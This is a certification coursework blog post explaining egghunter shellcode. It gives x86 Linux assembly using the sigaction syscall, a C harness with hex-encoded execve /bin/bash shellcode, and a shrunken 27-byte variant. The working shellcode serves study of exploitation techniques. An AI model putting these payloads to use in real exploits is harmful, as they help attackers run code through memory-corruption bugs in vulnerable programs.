This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1290
Assignment:
The assignment scope is to study about the egghunter shellcode and creating a working demo in which the payload is easily configurable.
Searching around on the internet I discovered that the best paper describing the matter is the one from www.hick.org -> http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
So what is an egghunter shellcode?
The paper describes the process of searching in the Virtual Address Space of a program and mentions that it is extremely useful in exploitation. In fact, some exploit vectors ( for example buffer overflows) do not allow much payload data to be used thus the shellcode size is very limited. In this circumstances, attacker should exploit the vulnerability in two different stages: the first stage is going to search for the effective payload (the second stage) which is located somewhere in memory.
In the paper, there are three different implementations of an egghunter shellcode. I decided to focus on the last one, based on the sigaction syscall. This implementation allows to validate multiple addresses at the same time and the sigaction purpose is to define an action to be taken in an EFAULT event occuring (when accessing an invalid address). Here is my implementation of egg hunter shellcode.
global _start section .text ;zeroing ecx xor ecx,ecx _start: ;page alignment or cx,0xfff next: ;default page size inc ecx ;sigaction syscall number push byte 67 pop eax ;executing syscall int 0x80 ;if EFAULT cmp al,0xf2 ;page alignment jz _start ;moving EGG mov eax,0x50905090 ;current address mov edi,ecx ;checking current address with EGG two times scasd jnz next scasd jnz next ;if equals jump to shellcode jmp edi
Adding the egg placeholder(0x50905090) to the execve shellcode will allow us to test it together with the egg shellcode in our shellcode template C program.
#include <stdio.h>
#include <string.h>
#define EGG "\x90\x50\x90\x50"
unsigned char code[] = EGG EGG"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
unsigned char egg[] = "\x31\xc9\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8"EGG"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
main()
{
printf("Egg length: %d\n",strlen(egg));
printf("Shellcode lenght: %d\n",strlen(code));
int (*ret)() = (int(*)())egg;
ret();
}
Where the EGG placeholder and the main shellcode are easily configurable.
Dirty+Small+Slow version:
Featured on Exploit-DB: https://www.exploit-db.com/exploits/45441/
I have successfully shrunk the egg shellcode up to 27 bytes removing the page alignment instruction. However this version of egg shellcode is very slow (up to 2-3 minutes) and a bit dirty, but in extreme size constraints it could be useful.
\x31\xc9\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf6\xb8EGG\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7
global _start section .text ;zeroing ecx xor ecx,ecx _start: ;increment inc ecx ;sigaction syscall number push byte 67 pop eax ;executing syscall int 0x80 ;if EFAULT cmp al,0xf2 ;page alignment jz _start ;moving EGG mov eax,0x50905090 ;current address mov edi,ecx ;checking current address with EGG two times scasd jnz _start scasd jnz _start ;if equals jump to shellcode jmp edi